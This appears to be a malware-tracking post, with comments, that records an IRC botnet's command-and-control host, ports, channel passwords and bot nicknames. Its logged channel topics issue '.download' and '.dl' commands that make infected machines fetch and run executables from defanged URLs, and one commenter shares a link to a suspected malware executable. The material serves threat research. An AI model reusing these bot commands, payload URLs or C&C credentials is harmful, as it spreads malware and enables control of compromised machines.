Resolved : [botnet.gen.tr] To [88.255.116.47]
Remote Host Port
botnet.gen.tr 6667 Passwd secret
Channels
Now talking in #XXX
Topic On: [ #XXX 12] [ 13 .html .lan .dwl hxxp://www.universe-bty.co.th/promina_images/MuTomyumZ_Full_V2.exe .visit hxxp://www.alizametal.com.tr/KCA.html ]
Topic By: [ KCA ]
[5:36](KCA) .visit hxxp://www.alizametal.com.tr/KCA.html
([iRooT-W7-USA]564523) hxxp://www.alizametal.com.tr/KCA.html Has Been Visited!
([iRooT-W7-USA]553377) hxxp://www.alizametal.com.tr/KCA.html Has Been Visited!
Now talking in #x
Topic On: [ #x ] [ .download hxxp://www.universe-bty.co.th/promina_images/MuTomyumZ_Full.exe 1 ]
Topic By: [ Jorgee ]
Username: 0812
Nickname: [0812|DEU|XP|KCA]
Channel: #CMDD# (Password: KCA)
Channeltopic: :!KCA
UPDATE:
Download URLs
hxxp://199.15.234.7/ (api.wipmania.com)
hxxp://
www.universe-bty.co.th
/promina_images/t.exe (www.universe-bty.co.th)
hxxp://
www.universe-bty.co.th
/promina_images/ded.exe (www.universe-bty.co.th)
C&C Server: 88.255.116.47:1453
Server Password:
Username: nivaykw
Nickname: U[DE|XPa]nivaykw
Channel: #cmd (Password: KCA)
Channeltopic: :!dl hxxp://www.sehat-iq.com/cm.exe !mdns hxxp://www.sehat-iq.com/av.txt
hosting infos:
http://whois.domaintools.com/88.255.116.47
Anonymous - September 29, 2012 at 12:19 am
Here is one to look at https://dl.dropbox.com/u/104452013/broaio.exe
Pig - September 29, 2012 at 6:03 pm
link is dead